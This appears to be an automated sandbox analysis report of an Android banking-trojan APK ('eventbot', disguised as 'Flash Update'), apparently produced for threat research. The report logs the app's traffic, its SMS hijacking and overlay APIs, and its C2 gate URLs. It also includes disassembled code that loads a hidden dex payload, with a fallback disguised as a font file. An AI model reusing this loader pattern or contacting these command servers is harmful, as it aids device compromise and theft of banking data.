                        abc_ic_star_half_black_36dp.pngPNG image, 36 x 36, 8-bit gray+alpha, non-interlaced253
                        abc_list_focused_holo.9.pngPNG image, 18 x 18, 8-bit/color RGBA, non-interlaced245
                        play-services-tasks.propertiesASCII text76
                        androidx.swiperefreshlayout_swiperefreshlayout.versionASCII text6
                        abc_ic_star_black_48dp.pngPNG image, 72 x 72, 8-bit gray+alpha, non-interlaced668
                        tooltip_frame_dark.xmlDBase 3 data file (484 records)484
                        abc_btn_radio_to_on_mtrl_015.pngPNG image, 48 x 48, 8-bit gray+alpha, non-interlaced563
                        abc_btn_radio_to_on_mtrl_015.pngPNG image, 96 x 96, 8-bit gray+alpha, non-interlaced1208
                        abc_btn_radio_to_on_mtrl_015.pngPNG image, 32 x 32, 8-bit gray+alpha, non-interlaced356
                        abc_list_longpressed_holo.9.pngPNG image, 12 x 12, 8-bit/color RGBA, non-interlaced214
                        abc_scrubber_primary_mtrl_alpha.9.pngPNG image, 15 x 18, 8-bit gray+alpha, non-interlaced205
                        abc_list_menu_item_radio.xmlDBase 3 data file (532 records)532
                        abc_list_divider_mtrl_alpha.9.pngPNG image, 1 x 1, 8-bit grayscale, non-interlaced167
                        abc_list_menu_item_layout.xmlDBase 3 data file (1396 records)1396
                        abc_ic_star_black_36dp.pngPNG image, 108 x 108, 8-bit gray+alpha, non-interlaced983
                        abc_shrink_fade_out_from_bottom.xmlDBase 3 data file (852 records)852
                        classes.dexDalvik dex file version 0352752464
                        abc_list_menu_item_icon.xmlDBase 3 data file (684 records)684
                        abc_ic_go_search_api_material.xmlDBase 3 data file (640 records)640
                        abc_action_mode_close_item_material.xmlDBase 3 data file (840 records)840
                        abc_action_bar_title_item.xmlDBase 3 data file (872 records)872
                        abc_primary_text_material_light.xmlDBase 3 data file (464 records)464
                        common_google_signin_btn_text_dark.xmlDBase 3 data file (712 records)712
                        abc_slide_in_bottom.xmlDBase 3 data file (396 records)396
                        abc_ic_commit_search_api_mtrl_alpha.pngPNG image, 32 x 32, 8-bit gray+alpha, non-interlaced173
                        tooltip_frame_light.xmlDBase 3 data file (484 records)484
                        common_google_signin_btn_text_disabled.xmlDBase 3 data file (1152 records)1152
                        2.jpgJPEG image data, JFIF standard 1.0129182
                        select_dialog_item_material.xmlDBase 3 data file (640 records)640
                        androidx.drawerlayout_drawerlayout.versionASCII text6
                        abc_btn_radio_to_on_mtrl_015.pngPNG image, 128 x 128, 8-bit gray+alpha, non-interlaced946
                        abc_ic_menu_copy_mtrl_am_alpha.pngPNG image, 36 x 36, 8-bit gray+alpha, non-interlaced202
                        abc_tooltip_enter.xmlDBase 3 data file (388 records)388
                        abc_btn_switch_to_on_mtrl_00012.9.pngPNG image, 41 x 41, 8-bit gray+alpha, non-interlaced1243
                        androidx.print_print.versionASCII text6
                        abc_tooltip.xmlDBase 3 data file (1056 records)1056
                        abc_switch_track_mtrl_alpha.9.pngPNG image, 94 x 64, 8-bit gray+alpha, non-interlaced813
                        abc_popup_background_mtrl_mult.9.pngPNG image, 128 x 64, 8-bit gray+alpha, non-interlaced1544
                        abc_list_pressed_holo_dark.9.pngPNG image, 9 x 9, 8-bit gray+alpha, non-interlaced208
                        abc_fade_in.xmlDBase 3 data file (388 records)388
                        common_google_signin_btn_icon_light_normal_background.9.pngPNG image, 48 x 48, 8-bit gray+alpha, non-interlaced500
                        abc_text_select_handle_left_mtrl_dark.pngPNG image, 66 x 33, 8-bit/color RGBA, non-interlaced278
                        ic_launcher.pngPNG image, 144 x 144, 8-bit/color RGBA, non-interlaced6387
                        abc_tab_indicator_material.xmlDBase 3 data file (468 records)468
                        abc_hint_foreground_material_light.xmlDBase 3 data file (564 records)564
                        abc_tint_switch_track.xmlDBase 3 data file (768 records)768
                        abc_ic_menu_cut_mtrl_alpha.pngPNG image, 96 x 96, 8-bit gray+alpha, non-interlaced910
                        abc_action_mode_bar.xmlDBase 3 data file (464 records)464
                        abc_text_select_handle_right_mtrl_dark.pngPNG image, 66 x 33, 8-bit/color RGBA, non-interlaced263
                        abc_btn_switch_to_on_mtrl_00012.9.pngPNG image, 54 x 54, 8-bit gray+alpha, non-interlaced1731
                        play-services-safetynet.propertiesASCII text84
                        notification_bg_low_normal.9.pngPNG image, 16 x 16, 8-bit grayscale, non-interlaced221
                        abc_popup_background_mtrl_mult.9.pngPNG image, 192 x 96, 8-bit gray+alpha, non-interlaced2305
                        abc_scrubber_control_off_mtrl_alpha.pngPNG image, 12 x 32, 8-bit gray+alpha, non-interlaced159
                        abc_textfield_search_default_mtrl_alpha.9.pngPNG image, 24 x 6, 8-bit gray+alpha, non-interlaced182
                        support_simple_spinner_dropdown_item.xmlDBase 3 data file (464 records)464
                        abc_btn_switch_to_on_mtrl_00001.9.pngPNG image, 41 x 41, 8-bit gray+alpha, non-interlaced1096
                        abc_list_menu_item_checkbox.xmlDBase 3 data file (528 records)528
                        abc_ic_menu_selectall_mtrl_alpha.pngPNG image, 48 x 48, 8-bit gray+alpha, non-interlaced183
                        abc_ic_menu_copy_mtrl_am_alpha.pngPNG image, 48 x 48, 8-bit gray+alpha, non-interlaced178
                        abc_scrubber_primary_mtrl_alpha.9.pngPNG image, 10 x 12, 8-bit gray+alpha, non-interlaced203
                        abc_ic_menu_paste_mtrl_am_alpha.pngPNG image, 48 x 48, 8-bit gray+alpha, non-interlaced243
                        abc_list_longpressed_holo.9.pngPNG image, 18 x 18, 8-bit/color RGBA, non-interlaced221
                        abc_tint_switch_track.xmlDBase 3 data file (664 records)664
                        abc_search_dropdown_item_icons_2line.xmlDBase 3 data file (1916 records)1916
                        1.jpgJPEG image data, JFIF standard 1.0111356
                        abc_ab_share_pack_mtrl_alpha.9.pngPNG image, 24 x 24, 8-bit gray+alpha, non-interlaced272
                        abc_ic_star_half_black_36dp.pngPNG image, 54 x 54, 8-bit gray+alpha, non-interlaced328
                        abc_cab_background_top_mtrl_alpha.9.pngPNG image, 24 x 24, 8-bit gray+alpha, non-interlaced216
                        abc_btn_check_to_on_mtrl_015.pngPNG image, 48 x 48, 8-bit gray+alpha, non-interlaced404
                        CERT.SFASCII text, with CRLF line terminators50787
                        abc_ratingbar_indicator_material.xmlDBase 3 data file (704 records)704
                        abc_dialog_material_background.xmlDBase 3 data file (372 records)372
                        72f5ed646cc01b83bc93e921e366fe0.jar.drZip archive data, at least v2.0 to extract47169
                        classes.dexDalvik dex file version 035102036
                        META-INFdirectory0

                        Network Behavior

                        Network Port Distribution

                        TCP Packets

                        TimestampSource PortDest PortSource IPDest IP
                        Mar 20, 2020 16:32:38.016916990 CET42662443192.168.1.92216.58.207.54
                        Mar 20, 2020 16:32:38.040333033 CET44342662216.58.207.54192.168.1.92
                        Mar 20, 2020 16:32:38.040736914 CET42662443192.168.1.92216.58.207.54
                        Mar 20, 2020 16:32:38.041032076 CET42662443192.168.1.92216.58.207.54
                        Mar 20, 2020 16:32:38.064981937 CET44342662216.58.207.54192.168.1.92
                        Mar 20, 2020 16:32:38.074240923 CET44342662216.58.207.54192.168.1.92
                        Mar 20, 2020 16:32:38.074261904 CET44342662216.58.207.54192.168.1.92
                        Mar 20, 2020 16:32:38.074279070 CET44342662216.58.207.54192.168.1.92
                        Mar 20, 2020 16:32:38.074525118 CET42662443192.168.1.92216.58.207.54
                        Mar 20, 2020 16:32:38.113471985 CET55266443192.168.1.92172.217.22.2
                        Mar 20, 2020 16:32:38.136787891 CET44355266172.217.22.2192.168.1.92
                        Mar 20, 2020 16:32:38.138284922 CET55266443192.168.1.92172.217.22.2
                        Mar 20, 2020 16:32:38.140793085 CET55266443192.168.1.92172.217.22.2
                        Mar 20, 2020 16:32:38.166656971 CET44355266172.217.22.2192.168.1.92
                        Mar 20, 2020 16:32:38.172022104 CET44355266172.217.22.2192.168.1.92
                        Mar 20, 2020 16:32:38.172061920 CET44355266172.217.22.2192.168.1.92
                        Mar 20, 2020 16:32:38.172082901 CET44355266172.217.22.2192.168.1.92
                        Mar 20, 2020 16:32:38.172230005 CET55266443192.168.1.92172.217.22.2
                        Mar 20, 2020 16:32:38.178749084 CET55266443192.168.1.92172.217.22.2
                        Mar 20, 2020 16:32:38.202313900 CET44355266172.217.22.2192.168.1.92
                        Mar 20, 2020 16:32:38.205614090 CET55266443192.168.1.92172.217.22.2
                        Mar 20, 2020 16:32:38.234330893 CET44355266172.217.22.2192.168.1.92
                        Mar 20, 2020 16:32:38.238607883 CET44355266172.217.22.2192.168.1.92
                        Mar 20, 2020 16:32:38.281722069 CET55266443192.168.1.92172.217.22.2
                        Mar 20, 2020 16:32:38.326200008 CET42662443192.168.1.92216.58.207.54
                        Mar 20, 2020 16:32:38.353740931 CET44342662216.58.207.54192.168.1.92
                        Mar 20, 2020 16:32:38.353771925 CET44342662216.58.207.54192.168.1.92
                        Mar 20, 2020 16:32:38.353945971 CET42662443192.168.1.92216.58.207.54
                        Mar 20, 2020 16:32:38.353991985 CET42662443192.168.1.92216.58.207.54
                        Mar 20, 2020 16:32:38.476016045 CET42662443192.168.1.92216.58.207.54
                        Mar 20, 2020 16:32:38.476234913 CET42662443192.168.1.92216.58.207.54
                        Mar 20, 2020 16:32:38.491822958 CET42662443192.168.1.92216.58.207.54
                        Mar 20, 2020 16:32:38.497725964 CET42662443192.168.1.92216.58.207.54
                        Mar 20, 2020 16:32:38.497945070 CET42662443192.168.1.92216.58.207.54
                        Mar 20, 2020 16:32:38.499834061 CET44342662216.58.207.54192.168.1.92
                        Mar 20, 2020 16:32:38.499887943 CET44342662216.58.207.54192.168.1.92
                        Mar 20, 2020 16:32:38.500026941 CET42662443192.168.1.92216.58.207.54
                        Mar 20, 2020 16:32:38.521446943 CET44342662216.58.207.54192.168.1.92
                        Mar 20, 2020 16:32:38.522233963 CET44342662216.58.207.54192.168.1.92
                        Mar 20, 2020 16:32:38.524326086 CET42662443192.168.1.92216.58.207.54
                        Mar 20, 2020 16:32:38.524957895 CET42662443192.168.1.92216.58.207.54
                        Mar 20, 2020 16:32:38.552699089 CET44342662216.58.207.54192.168.1.92
                        Mar 20, 2020 16:32:49.663134098 CET42662443192.168.1.92216.58.207.54
                        Mar 20, 2020 16:32:49.663521051 CET55266443192.168.1.92172.217.22.2
                        Mar 20, 2020 16:32:49.686419010 CET44342662216.58.207.54192.168.1.92
                        Mar 20, 2020 16:32:49.686841011 CET44355266172.217.22.2192.168.1.92
                        Mar 20, 2020 16:32:49.687247992 CET42662443192.168.1.92216.58.207.54
                        Mar 20, 2020 16:32:49.687396049 CET55266443192.168.1.92172.217.22.2
                        Mar 20, 2020 16:33:23.372822046 CET3551480192.168.1.9231.214.157.6
                        Mar 20, 2020 16:33:24.392178059 CET3551480192.168.1.9231.214.157.6
                        Mar 20, 2020 16:33:26.436446905 CET3551480192.168.1.9231.214.157.6
                        Mar 20, 2020 16:33:58.741019011 CET3551880192.168.1.9231.214.157.6
                        Mar 20, 2020 16:33:59.782358885 CET3551880192.168.1.9231.214.157.6
                        Mar 20, 2020 16:34:01.826271057 CET3551880192.168.1.9231.214.157.6
                        Mar 20, 2020 16:34:34.829188108 CET3552080192.168.1.9231.214.157.6
                        Mar 20, 2020 16:34:35.874509096 CET3552080192.168.1.9231.214.157.6
                        Mar 20, 2020 16:34:37.922095060 CET3552080192.168.1.9231.214.157.6
                        Mar 20, 2020 16:35:09.744796991 CET3552280192.168.1.9231.214.157.6
                        Mar 20, 2020 16:35:10.754143953 CET3552280192.168.1.9231.214.157.6
                        Mar 20, 2020 16:35:12.802165031 CET3552280192.168.1.9231.214.157.6
                        Mar 20, 2020 16:35:44.212460995 CET3552480192.168.1.9231.214.157.6
                        Mar 20, 2020 16:35:45.250386953 CET3552480192.168.1.9231.214.157.6
                        Mar 20, 2020 16:35:47.298069000 CET3552480192.168.1.9231.214.157.6
                        Mar 20, 2020 16:35:58.229185104 CET8056672172.217.18.100192.168.1.92
                        Mar 20, 2020 16:35:58.269996881 CET5667280192.168.1.92172.217.18.100
                        Mar 20, 2020 16:36:06.312820911 CET8041512172.217.16.163192.168.1.92
                        Mar 20, 2020 16:36:06.352797985 CET4151280192.168.1.92172.217.16.163
                        Mar 20, 2020 16:36:06.382957935 CET44333152172.217.18.100192.168.1.92
                        Mar 20, 2020 16:36:06.423456907 CET33152443192.168.1.92172.217.18.100
                        Mar 20, 2020 16:36:06.602843046 CET44333150172.217.18.100192.168.1.92
                        Mar 20, 2020 16:36:06.602884054 CET44333150172.217.18.100192.168.1.92
                        Mar 20, 2020 16:36:06.629590034 CET33150443192.168.1.92172.217.18.100
                        Mar 20, 2020 16:36:06.652955055 CET44333150172.217.18.100192.168.1.92
                        Mar 20, 2020 16:36:18.640269995 CET3552680192.168.1.9231.214.157.6
                        Mar 20, 2020 16:36:19.681888103 CET3552680192.168.1.9231.214.157.6
                        Mar 20, 2020 16:36:21.730355978 CET3552680192.168.1.9231.214.157.6

                        UDP Packets

                        TimestampSource PortDest PortSource IPDest IP
                        Mar 20, 2020 16:32:32.903966904 CET5046453192.168.1.928.8.8.8
                        Mar 20, 2020 16:32:32.937922001 CET53504648.8.8.8192.168.1.92
                        Mar 20, 2020 16:32:33.050826073 CET3733653192.168.1.928.8.8.8
                        Mar 20, 2020 16:32:33.082670927 CET53373368.8.8.8192.168.1.92
                        Mar 20, 2020 16:32:37.490849018 CET3499153192.168.1.928.8.8.8
                        Mar 20, 2020 16:32:37.522622108 CET53349918.8.8.8192.168.1.92
                        Mar 20, 2020 16:32:37.904392004 CET3939853192.168.1.928.8.8.8
                        Mar 20, 2020 16:32:37.938394070 CET53393988.8.8.8192.168.1.92
                        Mar 20, 2020 16:32:38.011077881 CET59594443192.168.1.92216.58.207.54
                        Mar 20, 2020 16:32:38.030136108 CET4068953192.168.1.928.8.8.8
                        Mar 20, 2020 16:32:38.035084009 CET44359594216.58.207.54192.168.1.92
                        Mar 20, 2020 16:32:38.035593033 CET59594443192.168.1.92216.58.207.54
                        Mar 20, 2020 16:32:38.074193001 CET53406898.8.8.8192.168.1.92
                        Mar 20, 2020 16:32:38.079806089 CET4659153192.168.1.928.8.8.8
                        Mar 20, 2020 16:32:38.112448931 CET53465918.8.8.8192.168.1.92
                        Mar 20, 2020 16:32:40.577564001 CET4043353192.168.1.928.8.8.8
                        Mar 20, 2020 16:32:40.618407011 CET53404338.8.8.8192.168.1.92
                        Mar 20, 2020 16:32:43.613384008 CET3578853192.168.1.928.8.8.8
                        Mar 20, 2020 16:32:43.647453070 CET53357888.8.8.8192.168.1.92
                        Mar 20, 2020 16:32:47.551843882 CET3934153192.168.1.928.8.8.8
                        Mar 20, 2020 16:32:47.590193033 CET53393418.8.8.8192.168.1.92
                        Mar 20, 2020 16:32:52.680191994 CET4657353192.168.1.928.8.8.8
                        Mar 20, 2020 16:32:52.719763994 CET53465738.8.8.8192.168.1.92
                        Mar 20, 2020 16:32:52.942168951 CET6534153192.168.1.928.8.8.8
                        Mar 20, 2020 16:32:52.974070072 CET53653418.8.8.8192.168.1.92
                        Mar 20, 2020 16:33:23.336016893 CET3764753192.168.1.928.8.8.8
                        Mar 20, 2020 16:33:23.370078087 CET53376478.8.8.8192.168.1.92
                        Mar 20, 2020 16:33:36.347174883 CET4309753192.168.1.928.8.8.8
                        Mar 20, 2020 16:33:36.380825043 CET53430978.8.8.8192.168.1.92
                        Mar 20, 2020 16:36:50.627427101 CET6867192.168.1.92192.168.1.2
                        Mar 20, 2020 16:36:50.627629042 CET6768192.168.1.2192.168.1.92

                        DNS Queries

                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                        Mar 20, 2020 16:32:37.904392004 CET192.168.1.928.8.8.80xfcc5Standard query (0)i.ytimg.comA (IP address)IN (0x0001)
                        Mar 20, 2020 16:32:38.030136108 CET192.168.1.928.8.8.80x99f6Standard query (0)www.youtube.comA (IP address)IN (0x0001)
                        Mar 20, 2020 16:33:23.336016893 CET192.168.1.928.8.8.80xae33Standard query (0)ora.studiolegalebasili.comA (IP address)IN (0x0001)
                        Mar 20, 2020 16:33:36.347174883 CET192.168.1.928.8.8.80x8348Standard query (0)ora.carlaarrabitoarchitetto.comA (IP address)IN (0x0001)

                        DNS Answers

                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                        Mar 20, 2020 16:32:37.938394070 CET8.8.8.8192.168.1.920xfcc5No error (0)i.ytimg.com216.58.207.54A (IP address)IN (0x0001)
                        Mar 20, 2020 16:32:38.074193001 CET8.8.8.8192.168.1.920x99f6No error (0)www.youtube.comyoutube-ui.l.google.comCNAME (Canonical name)IN (0x0001)
                        Mar 20, 2020 16:32:38.112448931 CET8.8.8.8192.168.1.920xed4dNo error (0)pagead.l.doubleclick.net172.217.22.2A (IP address)IN (0x0001)
                        Mar 20, 2020 16:33:23.370078087 CET8.8.8.8192.168.1.920xae33No error (0)ora.studiolegalebasili.com31.214.157.6A (IP address)IN (0x0001)
                        Mar 20, 2020 16:33:36.380825043 CET8.8.8.8192.168.1.920x8348Name error (3)ora.carlaarrabitoarchitetto.comnonenoneA (IP address)IN (0x0001)

                        HTTPS Packets

                        TimestampSource IPSource PortDest IPDest PortSubjectIssuerNot BeforeNot AfterJA3 SSL Client FingerprintJA3 SSL Client Digest
                        Mar 20, 2020 16:32:38.074279070 CET216.58.207.54443192.168.1.9242662CN=edgestatic.com, O=Google LLC, L=Mountain View, ST=California, C=US CN=GTS CA 1O1, O=Google Trust Services, C=USCN=GTS CA 1O1, O=Google Trust Services, C=US CN=GlobalSign, O=GlobalSign, OU=GlobalSign Root CA - R2Tue Mar 03 10:37:27 CET 2020 Thu Jun 15 02:00:42 CEST 2017Tue May 26 11:37:27 CEST 2020 Wed Dec 15 01:00:42 CET 2021
                        CN=GTS CA 1O1, O=Google Trust Services, C=USCN=GlobalSign, O=GlobalSign, OU=GlobalSign Root CA - R2Thu Jun 15 02:00:42 CEST 2017Wed Dec 15 01:00:42 CET 2021
                        Mar 20, 2020 16:32:38.172061920 CET172.217.22.2443192.168.1.9255266CN=www.googleadservices.com, O=Google LLC, L=Mountain View, ST=California, C=US CN=GTS CA 1O1, O=Google Trust Services, C=USCN=GTS CA 1O1, O=Google Trust Services, C=US CN=GlobalSign, O=GlobalSign, OU=GlobalSign Root CA - R2Tue Mar 03 10:45:04 CET 2020 Thu Jun 15 02:00:42 CEST 2017Tue May 26 11:45:04 CEST 2020 Wed Dec 15 01:00:42 CET 2021
                        CN=GTS CA 1O1, O=Google Trust Services, C=USCN=GlobalSign, O=GlobalSign, OU=GlobalSign Root CA - R2Thu Jun 15 02:00:42 CEST 2017Wed Dec 15 01:00:42 CET 2021

                        APK Behavior

                        Installation Messages
                        NameIs Error
                        • Unknown permission android.permission.REQUEST_COMPANION_RUN_IN_BACKGROUND in package com.example.eventbot
                        • Unknown permission android.permission.REQUEST_COMPANION_USE_DATA_IN_BACKGROUND in package com.example.eventbot
                        • type=1400 audit(0.0:627): avc: denied { call } for scontext=u:r:system_server:s0 tcontext=u:r:adbd:s0 tclass=binder permissive=1
                        • Replacing preferred activity com.example.eventbot/.sendShortMsg for user 0:
                        • Action: "android.intent.action.SENDTO"
                        • Category: "android.intent.category.DEFAULT"
                        • Scheme: "sms"
                        • AutoVerify=false
                        • Replacing preferred activity com.example.eventbot/.sendShortMsg for user 0:
                        • Action: "android.intent.action.SENDTO"
                        • Category: "android.intent.category.DEFAULT"
                        • Scheme: "smsto"
                        • AutoVerify=false
                        • Replacing preferred activity com.example.eventbot/.sendShortMsg for user 0:
                        • Action: "android.intent.action.SENDTO"
                        • Category: "android.intent.category.DEFAULT"
                        • Scheme: "mms"
                        • AutoVerify=false
                        • Replacing preferred activity com.example.eventbot/.sendShortMsg for user 0:
                        • Action: "android.intent.action.SENDTO"
                        • Category: "android.intent.category.DEFAULT"
                        • Scheme: "mmsto"
                        • AutoVerify=false
                        false

                        Simulated Events

                        TypeData
                        boot completed
                        • -
                        time tick
                        • -
                        incoming sms
                        • 0123456789
                        • this is a text message
                        outgoing sms
                        • 9876543210
                        • thank you
                        location change
                        • 54.13
                        • 12.14
                        motion simulation
                        • -
                        incoming call
                        • 0123456789
                        outgoing call
                        • 9876543210
                        time tick
                        • -
                        API: java.net.URL->openConnection at com.lib.sendPost:22 Show source
                        NameTypeValue
                        Return Valuecom.android.okhttp.internal.huc.HttpURLConnectionImpl
                        • toString: com.android.okhttp.internal.huc.HttpURLConnectionImpl:http://ora.studiolegalebasili.com/gate_cb8a5aea1ab302f0_c
                        API: android.content.pm.PackageManager->setComponentEnabledSetting at com.lib.showIcon:31 Show source
                        API: android.webkit.WebView-><init> at com.lib.requestA11yAlert:30 Show source
                        API: android.webkit.WebView-><init> at com.lib.doActivity:191 Show source
                        API: java.net.URL->openConnection at com.lib.downloadFile:23 Show source
                        API: android.webkit.WebView-><init> at com.lib.createOverlayOld:33 Show source
                        API: android.webkit.WebView-><init> at com.lib.makeWebOverlay:4 Show source
                        API: android.webkit.WebView-><init> at com.lib.createOverlay:24 Show source
                        API: android.content.ContentResolver->query at ..:52 Show source
                        API: android.app.NotificationManager->notify at ..:166 Show source
                        API: android.os.PowerManager$WakeLock->acquire at com.lib.setWakeLocks:44 Show source

                        20 Executed Methods

                        Cross References
                        APIs
                        • com.example.eventbot.service.loadLibMutex:Ljava/util/concurrent/Semaphore
                        • java.util.concurrent.Semaphore.acquire
                        • com.example.eventbot.service.getDir
                        • com.example.eventbot.service.genLibUpdateName
                        • java.io.File.<init>
                        • java.io.File.exists
                        • android.util.Log.d
                        • com.example.eventbot.service.getDir
                        • com.example.eventbot.service.genLibName
                        • java.io.File.<init>
                        • java.io.File.exists
                        • android.util.Log.d
                        • com.example.eventbot.service.fallbackLib
                        • android.util.Log.d
                        • java.lang.StringBuilder.<init>
                        • java.lang.StringBuilder.append
                        • java.io.File.length
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        • android.util.Log.d
                        • java.io.File.getAbsolutePath
                        • android.content.Context.getDir
                        • java.io.File.getAbsolutePath
                        • android.content.Context.getClassLoader
                        • dalvik.system.DexClassLoader.<init>
                        • dalvik.system.DexClassLoader.loadClass
                        • java.lang.Class.getConstructor
                        • java.lang.reflect.Constructor.newInstance
                        • java.lang.Class.getConstructor
                        • com.example.eventbot.events.context:Landroid/content/Context
                        • com.example.eventbot.service.getResources
                        • android.content.res.Resources.getString
                        • java.lang.Integer.valueOf
                        • java.lang.Integer.valueOf
                        • java.lang.Integer.valueOf
                        • java.lang.reflect.Constructor.newInstance
                        • com.example.eventbot.service.getDir
                        • com.example.eventbot.service.genLibUpdateName
                        • java.io.File.<init>
                        • java.io.File.delete
                        • com.example.eventbot.service.getDir
                        • com.example.eventbot.service.genLibName
                        • java.io.File.<init>
                        • java.io.File.exists
                        • java.io.File.delete
                        • com.example.eventbot.service.getDir
                        • com.example.eventbot.service.genLibUpdateName
                        • java.io.File.<init>
                        • java.io.File.exists
                        • java.io.File.renameTo
                        • java.lang.StringBuilder.<init>
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        • android.util.Log.d
                        • com.example.eventbot.service.loadLibMutex:Ljava/util/concurrent/Semaphore
                        • java.util.concurrent.Semaphore.release
                        • com.example.eventbot.service.loadLibMutex:Ljava/util/concurrent/Semaphore
                        • java.util.concurrent.Semaphore.release
                        Strings
                        • dex
                        • Galaxy Nexus
                        • dfe931bcbaf1ab88b1c3895ab745dc6.jar
                        • samsung
                        • [func] [service] [loadLib] afterUpdate
                        • 72f5ed646cc01b83bc93e921e366fe0.jar
                        • [func] [service] [loadLib] fallback
                        • fonts/default.ttf
                        • [func] [service] [loadLib] normal
                        • [func] [service] [loadLib] lib.length():
                        • outdex
                        • /data/user/0/com.example.eventbot/app_dex/72f5ed646cc01b83bc93e921e366fe0.jar
                        • /data/user/0/com.example.eventbot/app_outdex
                        • com.lib
                        • Flash Update
                        • 0.0.0.2
                        • 7e89013da4660c162aae1a624080eb48b330e7148f32b0105869977614affd63
                        • eventBot
                        • events
                        • http://ora.studiolegalebasili.com/gate_cb8a5aea1ab302f0_c;http://ora.carlaarrabitoarchitetto.com/gate_cb8a5aea1ab302f0_c
                        • test2005
                        • [func] [service] [loadLib] [fallback] exception:
                        Position Instruction Meta Information
                        0move-object/from16 v1, p0
                        1move/from16 v0, p2
                        3const-string v2, "dex"
                        4const/4 v3, 0x0
                        5if-eqz p3, :cond_e
                        6try_start_9:
                        7sget-object v4, Lcom/example/eventbot/service;->loadLibMutex:Ljava/util/concurrent/Semaphore;
                        9invoke-virtual {v4}, Ljava/util/concurrent/Semaphore;->acquire()V
                        10cond_e: new-instance v4, Ljava/io/File;
                        11const/4 v5, 0x0
                        13invoke-virtual {v1, v2, v5}, Lcom/example/eventbot/service;->getDir(Ljava/lang/String;I)Ljava/io/File;
                        14move-result-object v6
                        16invoke-virtual/range {p0 .. p0}, Lcom/example/eventbot/service;->genLibUpdateName()Ljava/lang/String;
                        • Time: 132735
                          • Return:
                            • samsung
                        • Time: 132776
                          • Return:
                            • Galaxy Nexus
                        • Time: 132910
                          • This:
                            • com.example.eventbot.service@5c14a30
                          • Return:
                            • dfe931bcbaf1ab88b1c3895ab745dc6.jar
                        17move-result-object v7
                        19invoke-direct {v4, v6, v7}, Ljava/io/File;-><init>(Ljava/io/File;Ljava/lang/String;)V
                        • Time: 132928
                          • This:
                            • /data/user/0/com.example.eventbot/app_dex/dfe931bcbaf1ab88b1c3895ab745dc6.jar
                          • p0: /data/user/0/com.example.eventbot/app_dex
                          • p1: dfe931bcbaf1ab88b1c3895ab745dc6.jar
                          • Return:
                            • /data/user/0/com.example.eventbot/app_dex/dfe931bcbaf1ab88b1c3895ab745dc6.jar
                        21invoke-virtual {v4}, Ljava/io/File;->exists()Z
                        • Time: 132960
                          • This:
                            • /data/user/0/com.example.eventbot/app_dex/dfe931bcbaf1ab88b1c3895ab745dc6.jar
                          • Return:
                            • false
                        22move-result v6
                        23const/4 v7, 0x1
                        24if-eqz v6, :cond_2c
                        26sget-object v6, Lcom/example/eventbot/cfg;->TAG:Ljava/lang/String;
                        28const-string v8, "[func] [service] [loadLib] afterUpdate"
                        30invoke-static {v6, v8}, Landroid/util/Log;->d(Ljava/lang/String;Ljava/lang/String;)I
                        31const/4 v6, 0x1
                        32goto/16 :goto_54
                        33cond_2c: new-instance v4, Ljava/io/File;
                        35invoke-virtual {v1, v2, v5}, Lcom/example/eventbot/service;->getDir(Ljava/lang/String;I)Ljava/io/File;
                        36move-result-object v6
                        38invoke-virtual/range {p0 .. p0}, Lcom/example/eventbot/service;->genLibName()Ljava/lang/String;
                        • Time: 132980
                          • Return:
                            • samsung
                        • Time: 132984
                          • Return:
                            • Galaxy Nexus
                        • Time: 133024
                          • This:
                            • com.example.eventbot.service@5c14a30
                          • Return:
                            • 72f5ed646cc01b83bc93e921e366fe0.jar
                        39move-result-object v8
                        41invoke-direct {v4, v6, v8}, Ljava/io/File;-><init>(Ljava/io/File;Ljava/lang/String;)V
                        • Time: 133072
                          • This:
                            • /data/user/0/com.example.eventbot/app_dex/72f5ed646cc01b83bc93e921e366fe0.jar
                          • p0: /data/user/0/com.example.eventbot/app_dex
                          • p1: 72f5ed646cc01b83bc93e921e366fe0.jar
                          • Return:
                            • /data/user/0/com.example.eventbot/app_dex/72f5ed646cc01b83bc93e921e366fe0.jar
                        43invoke-virtual {v4}, Ljava/io/File;->exists()Z
                        • Time: 133079
                          • This:
                            • /data/user/0/com.example.eventbot/app_dex/72f5ed646cc01b83bc93e921e366fe0.jar
                          • Return:
                            • false
                        44move-result v6
                        45if-nez v6, :cond_4c
                        47sget-object v6, Lcom/example/eventbot/cfg;->TAG:Ljava/lang/String;
                        49const-string v8, "[func] [service] [loadLib] fallback"
                        51invoke-static {v6, v8}, Landroid/util/Log;->d(Ljava/lang/String;Ljava/lang/String;)I
                        53const-string v6, "fonts/default.ttf"
                        55invoke-direct {v1, v4, v6}, Lcom/example/eventbot/service;->fallbackLib(Ljava/io/File;Ljava/lang/String;)Z
                        56goto/16 :goto_53
                        57cond_4c:
                        58sget-object v6, Lcom/example/eventbot/cfg;->TAG:Ljava/lang/String;
                        60const-string v8, "[func] [service] [loadLib] normal"
                        62invoke-static {v6, v8}, Landroid/util/Log;->d(Ljava/lang/String;Ljava/lang/String;)I
                        63goto_53: const/4 v6, 0x0
                        64goto_54:
                        65sget-object v8, Lcom/example/eventbot/cfg;->TAG:Ljava/lang/String;
                        66new-instance v9, Ljava/lang/StringBuilder;
                        68invoke-direct {v9}, Ljava/lang/StringBuilder;-><init>()V
                        70const-string v10, "[func] [service] [loadLib] lib.length(): "
                        72invoke-virtual {v9, v10}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        74invoke-virtual {v4}, Ljava/io/File;->length()J
                        • Time: 135372
                          • This:
                            • /data/user/0/com.example.eventbot/app_dex/72f5ed646cc01b83bc93e921e366fe0.jar
                          • Return:
                            • 47169
                        75move-result-wide v10
                        77invoke-virtual {v9, v10, v11}, Ljava/lang/StringBuilder;->append(J)Ljava/lang/StringBuilder;
                        79invoke-virtual {v9}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        80move-result-object v9
                        82invoke-static {v8, v9}, Landroid/util/Log;->d(Ljava/lang/String;Ljava/lang/String;)I
                        83new-instance v8, Ldalvik/system/DexClassLoader;
                        85invoke-virtual {v4}, Ljava/io/File;->getAbsolutePath()Ljava/lang/String;
                        86move-result-object v4
                        88const-string v9, "outdex"
                        89move-object/from16 v10, p1
                        91invoke-virtual {v10, v9, v5}, Landroid/content/Context;->getDir(Ljava/lang/String;I)Ljava/io/File;
                        92move-result-object v9
